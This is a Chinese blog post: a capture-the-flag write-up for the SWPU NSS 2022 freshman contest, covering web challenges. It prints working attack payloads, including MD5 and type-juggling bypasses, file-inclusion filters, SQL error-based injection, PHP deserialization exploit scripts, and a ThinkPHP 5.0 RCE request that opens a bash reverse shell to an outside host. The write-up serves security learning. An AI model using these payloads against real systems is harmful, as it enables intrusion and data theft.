funny_web

image-20220924230448911

image-20220924230431858

image-20220924230606307

访问rea11y.php得到源码

<?php
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
highlight_file(__FILE__);
include('flag.php');
if (isset($_GET['num'])) {
    $num = $_GET['num'];
    if ($num != '12345') {
        if (intval($num) == '12345') {
            echo $FLAG;
        }
    } else {
        echo "这为何相等又不相等";
    }
}

直接传参?num=12345a获得flag

奇妙的MD5

image-20220924230804326

请求头包含hint,直接使用特殊的md5绕过登陆ffifdyop

image-20220924230917453

image-20220924230950777

接着数组绕过就行,?x[]=1&y[]=2

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){
    echo $FLAG;
}

image-20220924231116537

where_am_i

image-20220924231213645

给了一张图片,提示什么是11位,果断猜测是图中的手机号,直接百度识图一把梭

image-20220924231615608

直接搜索酒店联系方式

image-20220924231708892

image-20220924231743172

访问ending.php直接拿到flag

ez_ez_php

源码

 <?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

image-20220924231934246

文件包含 php伪协议没什么好说的

webdog1__start

image-20220924232032022

md5绕过,用一个nd5前后都是0e开头的特殊payload就行0e215962017

https://blog.csdn.net/CSDNiamcoming/article/details/108837347

image-20220924232246747

image-20220924232339170

访问start.php看到这里的注释内容,提示bot,访问robots.txt

image-20220924232426112

image-20220924232503605

该死的套娃

image-20220924232533876

接着是一个先知长度的命令执行,以及一个关键词过滤,非常简单

image-20220924232806687

F1l1l1l1l1lag.php?get=echo%09`nl%09/fla*`;

Ez_upload

限制MIME类型为jpg,然后文件内容过滤了<?,可以使用.htaccess配合php伪协议编码绕过

image-20220924233226304

image-20220924233339734

接着访问1.jpg,flag直接就在环境变量,看了一下/flag是有权限的,不知道是不是想搞个一个提权,结果忘删了环境变量了

image-20220924233501948

numgame

image-20220924233743066

不让查看源代码,直接手动在url前面加上view-source:前缀

image-20220924233830513

然后再1.js中找到套娃线索,NsScTf.php

源码

<?php
error_reporting(0);
//hint: 与get相似的另一种请求协议是什么呢
include("flag.php");
class nss{
    static function ctf(){
        include("./hint2.php");
    }
}
if(isset($_GET['p'])){
    if (preg_match("/n|c/m",$_GET['p'], $matches))
        die("no");
    call_user_func($_GET['p']);
}else{
    highlight_file(__FILE__);
}

接着就是调用类的静态方法的方法,类名::方法名 ,然后使用php对类名方法名大小写不敏感进行绕过关键词

image-20220924234037722

image-20220924234052451

最后拿到flag

ez_ez_php(revenge)

 <?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

file=php://filter/convert.base64-encode/resource=/flag

ez_rce

访问robots.txt得到提示/NSS/index.php

image-20220927220120125

发现是TP5.0,直接网上拿payload打

image-20220927220209856

NSS/index.php?s=captcha
_method=__construct&filter[]=system&method=get&get[]=bash -c "bash -i >%26 /dev/tcp/xxx/2333 0>%261"

image-20220927220250220

发现需要提权,suid没有找到,env里面也没有

image-20220927220953488

flag在/nss/ctf/flag/flag

ez_sql

image-20220927214246322

post传参,然后报错注入,flag在NSS_tb表下的Secr3t字段

nss=1'/**/%26%26/**/updatexml(1,concat(0x7e,(select/**/substr(group_concat(Secr3t),30,20)/**/from/**/NSS_tb),0x7e),1)%23

NSS_db
NSS_tb,users
id,Secr3t,flll444g
id,username,password,USER,CURRENT_CONNECTION,TOTAL_CONNECTIONS
NSSCTF{c5c9aeda-560a-425b-ae7a-eaef3e4561bb}

ez_1zpop

源码:

 <?php
error_reporting(0);
class dxg
{
   function fmm()
   {
      return "nonono";
   }
}

class lt
{
   public $impo='hi';
   public $md51='weclome';
   public $md52='to NSS';
   function __construct()
   {
      $this->impo = new dxg;
   }
   function __wakeup()
   {
      $this->impo = new dxg;
      return $this->impo->fmm();
   }

   function __toString()
   {
      if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
         return $this->impo->fmm();
   }
   function __destruct()
   {
      echo $this;
   }
}

class fin
{
   public $a;
   public $url = 'https://www.ctfer.vip';
   public $title;
   function fmm()
   {
      $b = $this->a;
      $b($this->title);
   }
}

if (isset($_GET['NSS'])) {
   $Data = unserialize($_GET['NSS']);
} else {
   highlight_file(__file__);
}

非常常规的反序列化,直接修改lt:3lt:4绕过wakeupRCE

<?php


class lt
{
   public $impo;
   public $md51='QNKCDZO';
   public $md52='240610708';
}

class fin
{
   public $a='system';
   public $title='cat /flag';
}

$l = new lt();
$l2 = new lt();
$fin = new fin();

$l->impo=$fin;
echo serialize($l);

image-20220927222451481

1z_unserialize

源码:

<?php

class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;

     function  __destruct()
     {
        $a = $this->lt;

        $a($this->lly);
     }


}
unserialize($_POST['nss']);
highlight_file(__FILE__);


?> 
<?php


class lyh{
    public $url;
    public $lt='system';
    public $lly='cat /flag';

     function  __destruct()
     {
        $a = $this->lt;

        $a($this->lly);
     }


}
echo serialize(new lyh);

image-20220927222852121

xff

GET / HTTP/1.1
Host: 1.14.71.254:28053
User-Agent: Xiaohong
Referer: Home Page
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1
Upgrade-Insecure-Requests: 1

image-20220927223303379

js_sign

webmisc题

image-20220927214043940

document.getElementsByTagName("button")[0].addEventListener("click", ()=>{
    flag = "33 43 43 13 44 21 54 34 45 21 24 33 14 21 31 11 22 12 54 44 11 35 13 34 14 15"
    if (btoa(flag.value) == 'dGFwY29kZQ==') {
        alert("you got hint!!!");
    } else {
        alert("fuck off !!");
    }
}
)

dGFwY29kZQ==解码为tapcode,将flag进行解码

image-20220927214134619

拿到flag:NSSCTF{youfindflagbytapcode}

ez_ez_unserialize

源码

 <?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

exp

<?php

class X
{
    public $x = "fllllllag.php";

}

$a = serialize(new X());
echo $a;
?x=O:1:"X":3:{s:1:"x";s:13:"fllllllag.php";}

image-20221021210228962

funny_php

http://1.14.71.254:28247/?num=9e9&str=NSSNSSCTFCTF
md5_1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&md5_2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

image-20221021210957736

Power!

源码

<?php
    class FileViewer{
        public $black_list = "flag";
        public $local = "http://127.0.0.1/";
        public $path;
        public function __call($f,$a){
            $this->loadfile();
        }
        public function loadfile(){
            if(!is_array($this->path)){
                if(preg_match("/".$this->black_list."/i",$this->path)){
                    $file = $this->curl($this->local."cheems.jpg");
                }else{
                    $file = $this->curl($this->local.$this->path);
                }
            }else{
                $file = $this->curl($this->local."cheems.jpg");
            }
            echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';
        }
        public function curl($path){
            $url = $path;
            $curl = curl_init();
            curl_setopt($curl, CURLOPT_URL, $url);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($curl, CURLOPT_HEADER, 0);
            $response = curl_exec($curl);
            curl_close($curl);
            return $response;
        }
        public function __wakeup(){
            $this->local = "http://127.0.0.1/";
        }
    }
    class Backdoor{
        public $a;
        public $b;
        public $superhacker = "hacker.jpg";
        public function goodman($i,$j){
            $i->$j = $this->superhacker;
        }
        public function __destruct(){
            $this->goodman($this->a,$this->b);
            $this->a->c();
        }
    }
    if(isset($_GET['source'])){
        highlight_file(__FILE__);
    }else{
        if(isset($_GET['image_path'])){
            $path = $_GET['image_path'];    //flag in /flag.php
            if(is_string($path)&&!preg_match("/http:|gopher:|glob:|php:/i",$path)){
                echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
            }else{
                echo '<h2>Seriously??</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>';
            }

        }else if(isset($_GET['path_info'])){
            $path_info = $_GET['path_info'];
            $FV = unserialize(base64_decode($path_info));
            $FV->loadfile();
        }else{
            $path = "vergil.jpg";
            echo '<h2>POWER!!</h2>
            <img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
        }
    }
?>

反序列化

exp

<?php
class FileViewer
{
    public $black_list='1';
    public $local;
    public $path='';
}
class Backdoor
{
    public $a;
    public $b;
    public $superhacker;
}

$f = new FileViewer();
$b= new Backdoor();


$b->superhacker='http://127.0.0.1:65500?image_path=flag.php';
$b->b='local';
$b->a=$f;
$p = [$b,''];
$final = serialize($p);
// echo $final."<br>";
$final = str_replace('i:1;s:0:','i:0;s:0:',$final);
echo base64_encode($final);

image-20221021214427755

file_master

源码

<?php
    session_start();
    if(isset($_GET['filename'])){
        echo file_get_contents($_GET['filename']);
    }
    else if(isset($_FILES['file']['name'])){
        $whtie_list = array("image/jpeg");
        $filetype = $_FILES["file"]["type"];
        if(in_array($filetype,$whtie_list)){
            $img_info = @getimagesize($_FILES["file"]["tmp_name"]);
            if($img_info){
                if($img_info[0]<=20 && $img_info[1]<=20){
                    if(!is_dir("upload/".session_id())){
                        mkdir("upload/".session_id());
                    }
                    $save_path = "upload/".session_id()."/".$_FILES["file"]["name"];
                    move_uploaded_file($_FILES["file"]["tmp_name"],$save_path);
                    $content = file_get_contents($save_path);
                    if(preg_match("/php/i",$content)){
                        sleep(5);
                        @unlink($save_path);
                        die("hacker!!!");
                    }else{
                        echo "upload success!! upload/your_sessionid/your_filename";
                    }
                }else{
                    die("image hight and width must less than 20");
                }
            }else{
                die("invalid file head");
            }
        }else{
            die("invalid file type!image/jpeg only!!");
        }
    }else{
        echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents("welcome.jpg")).'">';
    }
?>

image-20221021215339288

image-20221021215416304

最后修改:2022 年 10 月 24 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏
本文作者:
 文章标题:SWPU NSS新生赛 2022
 本文地址:https://pysnow.cn/archives/549/
 版权说明:若无注明,本文皆Pysnow's Blog原创,转载请保留文章出处。